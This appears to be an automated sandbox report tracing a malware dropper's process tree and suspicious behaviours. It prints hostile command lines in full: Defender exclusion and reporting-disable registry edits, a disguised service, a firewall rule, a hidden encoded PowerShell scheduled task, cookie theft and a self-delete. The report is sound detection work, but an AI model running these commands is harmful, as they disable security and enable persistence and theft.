sahiba_2.exeWerFault.exejfiag3g_gg.exeWerFault.exepid process 1528 sahiba_2.exe 1528 sahiba_2.exe 636 WerFault.exe 636 WerFault.exe 1980 jfiag3g_gg.exe 1980 jfiag3g_gg.exe 3572 WerFault.exe 3572 WerFault.exe 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2712 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
sahiba_2.exepid process 1528 sahiba_2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
sahiba_4.exeWerFault.exesvchost.exeIxLPgPBUBbMK1DbayU6OSonq.exedescription pid process Token: SeDebugPrivilege 2288 sahiba_4.exe Token: SeRestorePrivilege 636 WerFault.exe Token: SeBackupPrivilege 636 WerFault.exe Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 1864 svchost.exe Token: SeCreatePagefilePrivilege 1864 svchost.exe Token: SeShutdownPrivilege 1864 svchost.exe Token: SeCreatePagefilePrivilege 1864 svchost.exe Token: SeShutdownPrivilege 1864 svchost.exe Token: SeCreatePagefilePrivilege 1864 svchost.exe Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeDebugPrivilege 2264 IxLPgPBUBbMK1DbayU6OSonq.exe Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 -
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
Sta.exe.pifpid process 4152 Sta.exe.pif 2712 2712 4152 Sta.exe.pif 4152 Sta.exe.pif 2712 2712 -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
Sta.exe.pifpid process 4152 Sta.exe.pif 4152 Sta.exe.pif 4152 Sta.exe.pif -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
HE889M7AGH4HJ59.exepid process 908 HE889M7AGH4HJ59.exe 908 HE889M7AGH4HJ59.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
20c63904837367a538c8ba66cfa9058c0082c2eb33299c6e5526bf1da0f456cd.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.exesahiba_1.exesahiba_6.exerUNdlL32.eXeWerFault.exeWerFault.exesahiba_5.exeWerFault.exedescription pid process target process PID 4004 wrote to memory of 1468 4004 20c63904837367a538c8ba66cfa9058c0082c2eb33299c6e5526bf1da0f456cd.exe setup_installer.exe PID 4004 wrote to memory of 1468 4004 20c63904837367a538c8ba66cfa9058c0082c2eb33299c6e5526bf1da0f456cd.exe setup_installer.exe PID 4004 wrote to memory of 1468 4004 20c63904837367a538c8ba66cfa9058c0082c2eb33299c6e5526bf1da0f456cd.exe setup_installer.exe PID 1468 wrote to memory of 4128 1468 setup_installer.exe setup_install.exe PID 1468 wrote to memory of 4128 1468 setup_installer.exe setup_install.exe PID 1468 wrote to memory of 4128 1468 setup_installer.exe setup_install.exe PID 4128 wrote to memory of 376 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 376 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 376 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 856 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 856 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 856 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 2128 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 2128 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 2128 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 1288 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 1288 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 1288 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 1792 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 1792 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 1792 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 4320 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 4320 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 4320 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 4316 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 4316 4128 setup_install.exe cmd.exe PID 4128 wrote to memory of 4316 4128 setup_install.exe cmd.exe PID 1288 wrote to memory of 2288 1288 cmd.exe sahiba_4.exe PID 1288 wrote to memory of 2288 1288 cmd.exe sahiba_4.exe PID 4320 wrote to memory of 1796 4320 cmd.exe sahiba_6.exe PID 4320 wrote to memory of 1796 4320 cmd.exe sahiba_6.exe PID 4320 wrote to memory of 1796 4320 cmd.exe sahiba_6.exe PID 856 wrote to memory of 1528 856 cmd.exe sahiba_2.exe PID 856 wrote to memory of 1528 856 cmd.exe sahiba_2.exe PID 856 wrote to memory of 1528 856 cmd.exe sahiba_2.exe PID 376 wrote to memory of 4768 376 cmd.exe sahiba_1.exe PID 376 wrote to memory of 4768 376 cmd.exe sahiba_1.exe PID 376 wrote to memory of 4768 376 cmd.exe sahiba_1.exe PID 1792 wrote to memory of 2880 1792 cmd.exe sahiba_5.exe PID 1792 wrote to memory of 2880 1792 cmd.exe sahiba_5.exe PID 1792 wrote to memory of 2880 1792 cmd.exe sahiba_5.exe PID 2128 wrote to memory of 4956 2128 cmd.exe sahiba_3.exe PID 2128 wrote to memory of 4956 2128 cmd.exe sahiba_3.exe PID 2128 wrote to memory of 4956 2128 cmd.exe sahiba_3.exe PID 4768 wrote to memory of 272 4768 sahiba_1.exe sahiba_1.exe PID 4768 wrote to memory of 272 4768 sahiba_1.exe sahiba_1.exe PID 4768 wrote to memory of 272 4768 sahiba_1.exe sahiba_1.exe PID 1796 wrote to memory of 4296 1796 sahiba_6.exe jfiag3g_gg.exe PID 1796 wrote to memory of 4296 1796 sahiba_6.exe jfiag3g_gg.exe PID 1796 wrote to memory of 4296 1796 sahiba_6.exe jfiag3g_gg.exe PID 2044 wrote to memory of 4012 2044 rUNdlL32.eXe rundll32.exe PID 2044 wrote to memory of 4012 2044 rUNdlL32.eXe rundll32.exe PID 2044 wrote to memory of 4012 2044 rUNdlL32.eXe rundll32.exe PID 936 wrote to memory of 4012 936 WerFault.exe rundll32.exe PID 936 wrote to memory of 4012 936 WerFault.exe rundll32.exe PID 3096 wrote to memory of 4956 3096 WerFault.exe sahiba_3.exe PID 3096 wrote to memory of 4956 3096 WerFault.exe sahiba_3.exe PID 1796 wrote to memory of 1980 1796 sahiba_6.exe jfiag3g_gg.exe PID 1796 wrote to memory of 1980 1796 sahiba_6.exe jfiag3g_gg.exe PID 1796 wrote to memory of 1980 1796 sahiba_6.exe jfiag3g_gg.exe PID 2880 wrote to memory of 744 2880 sahiba_5.exe uqCVDUJhUAjxr8BMCt2X63Of.exe PID 2880 wrote to memory of 744 2880 sahiba_5.exe uqCVDUJhUAjxr8BMCt2X63Of.exe PID 2880 wrote to memory of 744 2880 sahiba_5.exe uqCVDUJhUAjxr8BMCt2X63Of.exe PID 2488 wrote to memory of 744 2488 WerFault.exe uqCVDUJhUAjxr8BMCt2X63Of.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\20c63904837367a538c8ba66cfa9058c0082c2eb33299c6e5526bf1da0f456cd.exe"C:\Users\Admin\AppData\Local\Temp\20c63904837367a538c8ba66cfa9058c0082c2eb33299c6e5526bf1da0f456cd.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCB55B48D\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCB55B48D\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_7.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_6.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCB55B48D\sahiba_6.exesahiba_6.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_5.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCB55B48D\sahiba_5.exesahiba_5.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\uqCVDUJhUAjxr8BMCt2X63Of.exe"C:\Users\Admin\Documents\uqCVDUJhUAjxr8BMCt2X63Of.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 3967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\Tv87Tc6Camnd790RBf4gxJby.exe"C:\Users\Admin\Documents\Tv87Tc6Camnd790RBf4gxJby.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2056 -s 4687⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2056 -s 4767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\vuTW7EzEPi5T9GxPChO5GZxH.exe"C:\Users\Admin\Documents\vuTW7EzEPi5T9GxPChO5GZxH.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",8⤵
- Loads dropped DLL
-
C:\Users\Admin\Documents\qXhIXekf4Zi4t2R_VhJA0jh7.exe"C:\Users\Admin\Documents\qXhIXekf4Zi4t2R_VhJA0jh7.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\8k2t32_my_FdL7XcyTcHKNCw.exe"C:\Users\Admin\Documents\8k2t32_my_FdL7XcyTcHKNCw.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 5127⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 6447⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 6607⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 6647⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 9207⤵
- Program crash
-
C:\Users\Admin\Documents\iJLPth70h1_jTfwLAhGmnvJ7.exe"C:\Users\Admin\Documents\iJLPth70h1_jTfwLAhGmnvJ7.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\iJLPth70h1_jTfwLAhGmnvJ7.exe"C:\Users\Admin\Documents\iJLPth70h1_jTfwLAhGmnvJ7.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\GvvsWiHBeZH4lHGWCSJ_3fvy.exe"C:\Users\Admin\Documents\GvvsWiHBeZH4lHGWCSJ_3fvy.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\gdfmyff\7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wjbxjcf.exe" C:\Windows\SysWOW64\gdfmyff\7⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create gdfmyff binPath= "C:\Windows\SysWOW64\gdfmyff\wjbxjcf.exe /d\"C:\Users\Admin\Documents\GvvsWiHBeZH4lHGWCSJ_3fvy.exe\"" type= own start= auto DisplayName= "wifi support"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description gdfmyff "wifi internet conection"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start gdfmyff7⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 116 -s 10447⤵
- Program crash
-
C:\Users\Admin\Documents\rVFfuLLO0G0w0fvZu7k99cka.exe"C:\Users\Admin\Documents\rVFfuLLO0G0w0fvZu7k99cka.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3088 -s 4607⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3088 -s 4807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\btdRcJSiX0ys6g8zh7r8SozT.exe"C:\Users\Admin\Documents\btdRcJSiX0ys6g8zh7r8SozT.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Detto.xla7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"9⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"9⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"9⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"9⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^wtwRMqjYMlcblhfrOaJNpOohYASICCRoGRaYHSofIqwzkvtDhVASceYjWNSjoDvlzhRaVdvWpzypNPwCvgcGwZMDTye$" Hai.xla9⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pifSta.exe.pif V9⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\waitfor.exewaitfor /t 5 MsGxuGavEVaQbserVWhrA9⤵
-
C:\Users\Admin\Documents\Ei4ZAHeKgC05HSIWMe_2jobF.exe"C:\Users\Admin\Documents\Ei4ZAHeKgC05HSIWMe_2jobF.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\66J88.exe"C:\Users\Admin\AppData\Local\Temp\66J88.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\2FG33.exe"C:\Users\Admin\AppData\Local\Temp\2FG33.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\2FG33.exe"C:\Users\Admin\AppData\Local\Temp\2FG33.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\JGF18.exe"C:\Users\Admin\AppData\Local\Temp\JGF18.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\L1E5D.exe"C:\Users\Admin\AppData\Local\Temp\L1E5D.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\HE889M7AGH4HJ59.exehttps://iplogger.org/1OUvJ7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\F2D32.exe"C:\Users\Admin\AppData\Local\Temp\F2D32.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\qCR9dsXxTHldLr9xJ33ACHco.exe"C:\Users\Admin\Documents\qCR9dsXxTHldLr9xJ33ACHco.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 19407⤵
- Program crash
-
C:\Users\Admin\Documents\6wrRkKr3GveGBomnLI9uV5iA.exe"C:\Users\Admin\Documents\6wrRkKr3GveGBomnLI9uV5iA.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\tbXh5S2z5iGJML7ANVbAxoHg.exe"C:\Users\Admin\Documents\tbXh5S2z5iGJML7ANVbAxoHg.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\tbXh5S2z5iGJML7ANVbAxoHg.exe7⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 08⤵
-
C:\Users\Admin\Documents\o9svhle46RIMohDVGYzfqMGL.exe"C:\Users\Admin\Documents\o9svhle46RIMohDVGYzfqMGL.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\hxEA3Bezzg_aoPY_UZ9RuUqJ.exe"C:\Users\Admin\Documents\hxEA3Bezzg_aoPY_UZ9RuUqJ.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 4767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\IxLPgPBUBbMK1DbayU6OSonq.exe"C:\Users\Admin\Documents\IxLPgPBUBbMK1DbayU6OSonq.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_4.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCB55B48D\sahiba_4.exesahiba_4.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_3.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCB55B48D\sahiba_3.exesahiba_3.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 16366⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_2.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCB55B48D\sahiba_2.exesahiba_2.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCB55B48D\sahiba_1.exesahiba_1.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCB55B48D\sahiba_1.exe"C:\Users\Admin\AppData\Local\Temp\7zSCB55B48D\sahiba_1.exe" -a6⤵
- Executes dropped EXE
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 6003⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4012 -ip 40121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4956 -ip 49561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 744 -ip 7441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 2056 -ip 20561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2736 -ip 27361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 4681⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3088 -ip 30881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\7zS76DE.tmp\Install.exe.\Install.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8BAE.tmp\Install.exe.\Install.exe /S /site_id "525403"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&4⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:325⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&4⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:325⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gWrzptOsv" /SC once /ST 08:03:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gWrzptOsv"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5016 -ip 50161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2736 -ip 27361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
